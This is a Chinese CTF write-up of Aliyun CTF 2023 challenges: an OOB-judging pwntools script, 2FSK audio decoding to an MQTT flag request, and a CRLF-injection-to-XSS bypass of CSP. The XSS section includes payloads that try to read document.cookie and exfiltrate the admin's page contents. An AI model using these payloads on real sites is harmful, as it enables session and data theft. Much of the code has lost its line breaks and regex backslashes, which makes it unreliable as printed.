2023 阿里云CTF / AliyunCTF 部分WriteUp

阿里云CTF 2023
比赛时间:4月21日 21:00 - 4月23日 21:00,总计48h
  • 热身赛:热身赛将于4月2日0:00开始,4月21日 0:00结束。
  • 正式赛:正式赛将于4月21日21:00开始,4月23日21:00结束。

感觉最近事情比较杂,于是大概花了点时间瞄了几眼题目,卡住的题目赛后又来复现了一下,这里记录一下 writeup 喵。


nc 1337

Prog := DefList ArrList;DefList := { varDef ';' }ArrList := { arrayExpr ';' }Typename := 'int'              ;varDef   := Typename Id {'[' expr ']'}             | Typename Id '=' DigitSequence                               ;
arrayUnit := Id '[' expr ']' {'[' expr ']'} ;
arrayExpr := Id AssignmentOperator arrayUnit | Id AssignmentOperator expr | arrayUnit AssignmentOperator expr ;
expr := arrayUnit op expr | Id op expr | DigitSequence op expr | arrayUnit | Id | DigitSequence ;op := '/' |'*' | '+' | '-' ;AssignmentOperator := '=' ;Id := IdNondigit { IdNondigit | digit } ;DigitSequence := nonzero-digit { digit } ;nonzero-digit := '1' | '2' | '3' | '4' | '5' | '6' | '7' | '8' | '9' ;digit := '0' |  '1' | '2' | '3' | '4' | '5' | '6' | '7' | '8' | '9' ;

def proof_of_work():    s = os.urandom(10)    digest = sha256(s).hexdigest()    my_print("sha256(XXX + {0}) == {1}".format(s[3:].hex(),digest))    my_print("Give me XXX in hex: ")    x = read_str()    if len(x) != 6 or x != s[:3].hex():        my_print("Wrong!")        return False    return True
def PoW(): if not proof_of_work():        sys.exit(-1)
说来这个 proof_of_work 有点坑,用的 hex,于是需要 repeat=6
然后试了试发现他最多会有两维数组,相对而言情况不是特别多,判断来说其实用 regex + exec 就行了
喵喵的 exp 如下,可能有点乱倒是了,定义了个无限大的数 float('inf'),然后一堆 if 走天下,出现未知错误(比如未定义的变量)之类就交给 Exception 处理输出 unknown
注释的地方是一些可能的 pattern example
from pwn import *from itertools import productfrom string import ascii_letters, digits, hexdigitsfrom hashlib import sha256import reimport sys
# context.log_level = 'debug'context.timeout = 10
r = remote('', 1337)rec = r.recvline().strip().decode()suffix = rec.split("+ ")[1].split(")")[0]digest = rec.split("== ")[1]log.info(f"suffix: {suffix}ndigest: {digest}")
for comb in product('0123456789abcdef', repeat=6): prefix = ''.join(comb) if sha256(bytes.fromhex(prefix+suffix)).hexdigest() == digest: print(prefix) breakelse: log.info("PoW failed")r.sendlineafter(b"Give me XXX in hex: ", prefix.encode())r.recvuntil(b"Good luck!n")

def parse_program(program): # print(locals()) for line in program.splitlines()[:-1]: line = line.strip().replace("/", "//") if not line: continue log.info(f'>>>>>> {line}') if line.startswith("int"): if '=' in line: # int n1 = 207; exec(line.lstrip('int').strip()) else: match = re.findall(r'ints+(w+);', line) log.info(f"-> match1-1: {match}") if match: # int x; exec(f"{match[0][0]} = float('inf')") continue match = re.findall( r'ints+(w+)[s*(.*?)s*][s*(.*?)s*];', line) if match: # int a[ 145 ][ 774 ]; # int a[ n ][n+23 ] log.info(f"-> match1-2: {match[0]}") exec( f"{match[0][0]} = [[float('inf')] * ({match[0][2]})] * ({match[0][1]})") continue match = re.findall(r'ints+(w+)[s*(.*?)s*];', line) if match: # int a[n1]; log.info(f"-> match1-3: {match[0]}") exec(f"{match[0][0]} = [float('inf')] * ({match[0][1]})")
elif '=' in line: # a[ 17 ] = 579; # c[a[ 17 ] - b[ 349 ]] = 4516; match2 = re.findall(r'(w+)[s*(.*?)s*]s*=', line) match3 = re.findall( r'(w+)[s*(.*?)s*][s*(.*?)s*]s*=', line) if match3: log.info(f"-> match3: {match3[0]}") if eval(match3[0][1]) in [float('inf'), float('-inf')] or eval(match3[0][2]) in [float('inf'), float('-inf')] or eval(match3[0][1]) < 0 or eval(match3[0][2]) < 0: raise IndexError elif match2: log.info(f"-> match2: {match2[0]}") if eval(match2[0][1]) in [float('inf'), float('-inf')] or eval(match2[0][1]) < 0: # Uninitialized variable raise IndexError log.info(f"dddddddddddddddddddddddddddd, {line}") exec(line)

cnt = 1while cnt <= 300: info = r.recvline().decode().strip() log.info(info) if "Wrong judgment!" in info: sys.exit(-1)
program = r.recvuntil(b'Your answer (safe/oob/unknown): n').decode() log.info(f"{cnt} ===> n{program}") cnt += 1 try: parse_program(program) except IndexError: log.info('[+] OOB') r.sendline(b'oob') except Exception as e: log.info(f'[+] Unknown Error.....n{e}') r.sendline(b'unknown') else: log.info('[+] safe') r.sendline(b'safe')

r.interactive()# aliyunctf{0k_y0u_kn0w_h0w_to_analyse_Pr0gram}
说来如果正经做的话估计得写个 编译原理里的 AST,喵喵不会,而且写起来太复杂了,算了(


给了个声波 OVUB7rdc9oH112Ve.wav

2023 阿里云CTF / AliyunCTF 部分WriteUp

2023 阿里云CTF / AliyunCTF 部分WriteUp
很明显是通信原理里的 2FSK 调制,也可以理解成两个不同频率的 2ASK 的叠加,这里正好他们的振幅也不一样还是挺好区分的 ~~(甚至凌晨做到后面做不出来怀疑人生,翻出通信原理笔记看了看,没错啊~~

2023 阿里云CTF / AliyunCTF 部分WriteUp

于是很容易想到转换成 01 字符串,然后试着转成 ASCII 或者理解成什么编码,如果是平方数的话可能转二维码之类的(然而后面发现并不是
import waveimport matplotlib.pyplot as pltimport numpy as np

with wave.open('OVUB7rdc9oH112Ve.wav') as w: framerate = w.getframerate() frames = w.getnframes() channels = w.getnchannels() width = w.getsampwidth() print('sampling rate:', framerate, 'Hz') print('length:', frames, 'samples') print('channels:', channels) print('sample width:', width, 'bytes')
data = w.readframes(frames)
sig = np.frombuffer(data, dtype='<i2').reshape(-1, channels)sigl = [i[0] for i in sig]len(sigl)# 499640

seg = [0]for i in range(1, len(sigl) - 1): l0, l1, l2 = sigl[i-1], sigl[i], sigl[i+1] if l0 < l1 and l2 < l1: seg.append(l1//100) if l1 == 0 and seg[-1] != 0: seg.append(l1//100)len(seg)# 6127

bsec = []tmp = []for i in seg[1:]: if abs(i) > 0: assert i in [73, 83] if i == 73: tmp.append(0) elif i == 83: tmp.append(1) else: if len(tmp) > 0: bsec.append(tmp) tmp = []len(bsec)# 6

print(bsec[0] == bsec[1] == bsec[2])print(bsec[3] == bsec[4] == bsec[5])# True# True
这个 bsec 就是那6个不同的片段,前三段和后三段各自确实是重复的

2023 阿里云CTF / AliyunCTF 部分WriteUp

2023 阿里云CTF / AliyunCTF 部分WriteUp

for i in range(20):    print(''.join(map(lambda i:'.' if i == 0 else '|', bsec[1][29*i:29*(i+1)])))
def reduce34bs(bs):    i = 0    bits = []    while i < len(bs):        assert bs[i] in [0, 1]        if bs[i] == 1:            assert bs[i+1] == 1            assert bs[i+2] == 1            bits.append(1)            i += 3        elif bs[i] == 0:            assert bs[i+1] == 0            assert bs[i+2] == 0            assert bs[i+3] == 0            bits.append(0)            i += 4    return bits
from scapy.utils import hexdump
bsl = reduce34bs(bsec[0])print(len(bsl))s = ''.join(map(str,bsl))print(s)data = int(s, 2).to_bytes(len(s)//8, 'big')print(data)hexdump(data)


41600101010001010100010101000101010001010100010101000101010001010100010101000101010001010100010101000101010001010100010101000101010011111011100110110111101101111010100101101101001000010011101000110110011111100111011001100110011100010110000100100110001001100010100101111101001101000010100101100001101111100010110010111011001001111010101000101001101110100010010100101110101111000110110010110101001111010010100100110110011b'****************}xcdxbdxbdKitxd1xb3xf3xb33x8bt11Kxe9xa1Krxf1exd9=QMxd1)uxe3exa9xe9Ixb3'0000 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************0010 7D CD BD BD 4B 69 09 D1 B3 F3 B3 33 8B 09 31 31 }...Ki.....3..110020 4B E9 A1 4B 0D F1 65 D9 3D 51 4D D1 29 75 E3 65 K..K..e.=QM.)u.e0030 A9 E9 49 B3 ..I.


bsl2 = reduce34bs(bsec[3])print(len(bsl2))s2 = ''.join(map(str,bsl2))print(s2)data2 = int(s2, 2).to_bytes(len(s2)//8, 'big')print(data2)hexdump(data2)
1600010101000101010001010100010101000101010001010100010101000101010001010100010101000101010001010100010101000101010001010100010101010001101100011011000110110001101b'****************x8dx8dx8dx8d'0000  2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A  ****************0010  8D 8D 8D 8D     
这 **************** 一共 16 个,倒是感觉有希望,后面这堆又是啥???

2023 阿里云CTF / AliyunCTF 部分WriteUp

01 交换过来也不大对劲(

2023 阿里云CTF / AliyunCTF 部分WriteUp

会不会附件错了?重新对了下 readme 里的 md5,没错啊,怀疑人生了(
后来发现是没试过把 01 交换之后的逆序,啊啊啊啊啊!!!!
bsl = reduce34bs(bsec[0])bsl = [1 if i == 0 else 0 for i in bsl][::-1]s = ''.join(map(str,bsl))print(s)data = int(s, 2).to_bytes(len(s)//8, 'big')print(data)hexdump(data)


00110010011011010110100001101010010110010011100001010001011010110111010001001101011101010100001101100100010110010111000001001111001011010111101001101000001011010111001101110011011011110010111000110011001100100011000000110010011101000110111101101001001011010100001001000010010011000100000110101011101010111010101110101011101010111010101110101011101010111010101110101011101010111010101110101011101010111010101110101011b'2mhjY8QktMuCdYpO-zh-sso.3202toi-BBLAxabxabxabxabxabxabxabxabxabxabxabxabxabxabxabxab'0000 32 6D 68 6A 59 38 51 6B 74 4D 75 43 64 59 70 4F 2mhjY8QktMuCdYpO0010 2D 7A 68 2D 73 73 6F 2E 33 32 30 32 74 6F 69 2D -zh-sso.3202toi-0020 42 42 4C 41 AB AB AB AB AB AB AB AB AB AB AB AB BBLA............0030 AB AB AB AB

这里很明显再逆序一下,得到 ALBB-iot2023.oss-hz-OpYdCuMtkQ8Yjhm2
根据 aliyun oss 的访问域名规则,构造个 http://albb-iot2023.oss-cn-hangzhou.aliyuncs.com/OpYdCuMtkQ8Yjhm2
然后发现被 rickroll 了,跳转到了 D^3CTF 的页面(这波预热好啊

2023 阿里云CTF / AliyunCTF 部分WriteUp

删掉 ALBB-(阿里巴巴?) 之后访问,会下载得到一个 binary
$ file OpYdCuMtkQ8Yjhm2 OpYdCuMtkQ8Yjhm2: Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|PIE>
可恶啊,怎么你们人均 Mac OS 用户啊!

要是喵喵有 x86 mac 的话这个 binary 就能直接跑了 ~~(甚至通过后面的分析发现简单 patch 一下就能出 flag 了~~


2023 阿里云CTF / AliyunCTF 部分WriteUp


2023 阿里云CTF / AliyunCTF 部分WriteUp

既然不能直接跑,那还得找个 MQTT Client 来
参考 阿里云的帮助文档 MQTT-TCP连接通信,这个手动算感觉好麻烦(x

2023 阿里云CTF / AliyunCTF 部分WriteUp

于是找一找有没有现成的代码,参考阿里云的 Paho-MQTT Python接入示例 帮助文档
先装个 库
pip install paho-mqtt
然后 下载官方的示例代码包
把 iot.py 里的连接信息改成题目里面的
根据他给的提示,发个 "{"id":"flag"}" 就好了
import jsonimport timeimport paho.mqtt.client as mqttfrom MqttSign import AuthIfo# set the device info, include product key, device name, and device secretproductKey = "a1eAwsBKddO"deviceName = "ncApIY2XV9NUIY4VpbGk"deviceSecret = "04845e512ead208b2437d970a154d69e"# set timestamp, clientid, subscribe topic and publish topictimeStamp = str((int(round(time.time() * 1000))))clientId = "192.168.****"subTopic = "/" + productKey + "/" + deviceName + "/user/get"pubTopic = "/" + productKey + "/" + deviceName + "/user/update"# set host, porthost = productKey + ".iot-as-mqtt.cn-shanghai.aliyuncs.com"# instanceId = "***"# host = instanceId + ".mqtt.iothub.aliyuncs.com"port = 1883# set tls crt, keepalivetls_crt = "root.crt"keepAlive = 300# calculate the login auth info, and set it into the connection optionsm = AuthIfo()m.calculate_sign_time(productKey, deviceName,                      deviceSecret, clientId, timeStamp)client = mqtt.Client(m.mqttClientId)client.username_pw_set(username=m.mqttUsername, password=m.mqttPassword)client.tls_set(tls_crt)
def on_connect(client, userdata, flags, rc): if rc == 0: print("Connect aliyun IoT Cloud Sucess") else: print("Connect failed... error code is:" + str(rc))
def on_message(client, userdata, msg): topic = msg.topic payload = msg.payload.decode() print("receive message ---------- topic is : " + topic) print("receive message ---------- payload is : " + payload)
    if ("thing/service/property/set" in topic): on_thing_prop_changed(client, msg.topic, msg.payload)
def on_thing_prop_changed(client, topic, payload): post_topic = topic.replace("service", "event") post_topic = post_topic.replace("set", "post") Msg = json.loads(payload) params = Msg['params'] post_payload = "{"params":" + json.dumps(params) + "}" print("reveice property_set command, need to post ---------- topic is: " + post_topic) print("reveice property_set command, need to post ---------- payload is: " + post_payload) client.publish(post_topic, post_payload)
def connect_mqtt(): client.connect(host, port, keepAlive) return client
def publish_message(): # publish 5 messages to pubTopic("/a1LhUsK****/python***/user/update") for i in range(5): message = "ABC" + str(i) client.publish(pubTopic, message) print("publish msg: " + str(i)) print("publish msg: " + message) time.sleep(2)
def publish_message2(message): client.publish(pubTopic, message) print("publish msg: " + message)
def subscribe_topic(): # subscribe to subTopic("/a1LhUsK****/python***/user/get") and request messages to be delivered client.subscribe(subTopic) print("subscribe topic: " + subTopic)
client.on_connect = on_connectclient.on_message = on_messageclient = connect_mqtt()client.loop_start()time.sleep(2)
subscribe_topic()publish_message2("{"id":"1"}")publish_message2("{"id":"admin"}")publish_message2("{"id":"flag"}")# aliyunctf{5558be2e286febe9ba54c721cb4a0e61}
while True: time.sleep(1)

2023 阿里云CTF / AliyunCTF 部分WriteUp


赛后看了 草帽 的 wp,发现用 minimodem 就能直接解出来,呜呜

2023 阿里云CTF / AliyunCTF 部分WriteUp


minimodem - general-purpose software audio FSK modem for GNU/Linux systems

Minimodem is a command-line program which decodes (or generates) audio modem tones at any specified baud rate, using various framing protocols. It acts a general-purpose software FSK modem, and includes support for various standard FSK protocols such as Bell103, Bell202, RTTY, TTY/TDD, NOAA SAME, and Caller-ID.

Minimodem can play and capture audio modem tones in real-time via the system audio device, or in batched mode via audio files.

Minimodem can be used to transfer data between nearby computers using an audio cable (or just via sound waves), or between remote computers using radio, telephone, or another audio communications medium.

via http://www.whence.com/minimodem/

source code: https://github.com/kamalmostafa/minimodem

是个专门用来解析、生成声音形式的 FSK 猫 信号的工具

顺便,再来复习一下通信原理的知识,看看远方 2FSK 的频谱吧

2023 阿里云CTF / AliyunCTF 部分WriteUp

大概来说就是以两个频率为各自中心的展宽,连续谱是那两个尖峰,然后以他为中心有个 Sa 函数的展宽是离散谱
往 <你最喜欢的 JavaScript 引擎> 里加人造漏洞有啥意思咧?往最新最热的原版里整点群众喜闻乐见的功能进去不就得了。
注意:不需要 0day, 0.5day, 1day, 各种 day。不需要利用漏洞。这是杂项题,不是 Pwn 题。
nc 1337
给了个 v8,然后一些 patch 文件,没咋看(
然后报错把 flag 吐出来了!(傻逼非预期

2023 阿里云CTF / AliyunCTF 部分WriteUp

v8.deserialize on WebAssembly module fails with "Unable to deserialize cloned data"



新·笔记本 服务每5分钟会重置。
Obsidian 不需要用扫描器
Server: tiny-http (Rust) 是个 Rust 写的 web server
还给了个 rust binary 的附件,这玩意不好逆向啊,然后扔给逆向手了,然后看吐了(不懂给了有啥用,看起来太麻烦了
队友试了下发现 note 页面有 CSP 限制
Content-Security-Policy: default-src 'self'; script-src 'none';
赛后其他师傅说这题可以 CRLF 注入绕过 CSP 然后打 XSS
然后喵喵试了试,首先随便 admin password 登录,然后发个 blog

2023 阿里云CTF / AliyunCTF 部分WriteUp

访问具体的 notes,这个 /note 路由下的 id 会放到 headers 里的 Note-Id 里,然后构造 %0d%0a 可以插入其他 header

2023 阿里云CTF / AliyunCTF 部分WriteUp

进一步可以插入到 body 里

2023 阿里云CTF / AliyunCTF 部分WriteUp

那就手动加上 Content-Length 好了<script>alert('meow');<%2Fscript>

2023 阿里云CTF / AliyunCTF 部分WriteUp

本来想试试偷 admin 的 cookie,于是构造 payload
miaoContent-Length: 68
url encode 之后拼接下也就是''+document.cookie%3C/script%3E
然后这里 contact admin,算个 md5 PoW,提交

2023 阿里云CTF / AliyunCTF 部分WriteUp

发现打了半天都打不通,队友试了发现得把 URL 改成 localhost:8000 才行(
然后发现并没有 cookie,是空的

2023 阿里云CTF / AliyunCTF 部分WriteUp

这里可以写个脚本算一算 body 部分的长度,不过后来发现其实 Content-Length 对于解题而言不是很必要,不如为了方便直接把这个 header 删了(
换个思路,先 fetch admin 的 /blog,然后看看里面有啥东西

2023 阿里云CTF / AliyunCTF 部分WriteUp

最后 fetch 那篇写了 flag 的博客

2023 阿里云CTF / AliyunCTF 部分WriteUp

base64 decode 就能拿到 flag 了

2023 阿里云CTF / AliyunCTF 部分WriteUp

甚至这个链接可以直接访问拿到 flag

2023 阿里云CTF / AliyunCTF 部分WriteUp

当然也可以用 XMLHttpRequest
<script>const Http = new XMLHttpRequest();const url = '/blog';Http.open("GET", url);Http.send();Http.onreadystatechange = (e) => {document.write('<img src="' + escape(Http.responseText.slice(100)) + '">');}</script>
顺便说一下,这个 PoW 如果对了的话会 303 跳转到 /,而错误的话还是 303 到 /submit 页面
问的话,简单来说是喵喵调了一晚上发现怎么远程老是没东西回来,但是队友可以,以及拿同样的 payload 打喵喵的 VPS 也可以,而我这个电脑这个浏览器就不行?
想不通怎么那么玄学,于是从 Firefox 换成 Chrome 试了试,发现也是行的???
然后拿浏览器里的原始报文去 BurpSuite 发包,先 GET 获取 PoW 再 POST 提交也是行的???那就更玄学了。
最后想不通给浏览器挂上 burp 的代理,看请求才发现原来是一个请求重复了两次,后一个请求还不在浏览器的 network 里出现,而正是这个请求把喵喵的验证码给冲掉了,气死了啊啊啊啊!
盲猜就是每个浏览器插件锅了,于是试了几个可能的插件,发现果然是其中一个的问题,说的就是你 FindSomething,谁能想到还有这种非预期行为啊(
然后发现居然 有 issue 提过 同一个 url 请求两次 这件事情了:

2023 阿里云CTF / AliyunCTF 部分WriteUp

顺便,通过逆向可以发现这题用的 web 框架应该是 Rouille, a Rust web micro-framework https://github.com/tomaka/rouille


喵喵这次看的题目不多,不过包括队友在内好多其他开了的题目都卡住了,阿里云 CTF 真难啊!!!
一定看大师傅们的 wp 好好学习!
BTW, 官方 writeup 也出来了:https://xz.aliyun.com/t/12485
欢迎大师傅们到 喵喵的博客 逛逛喵~


匿名网友 填写信息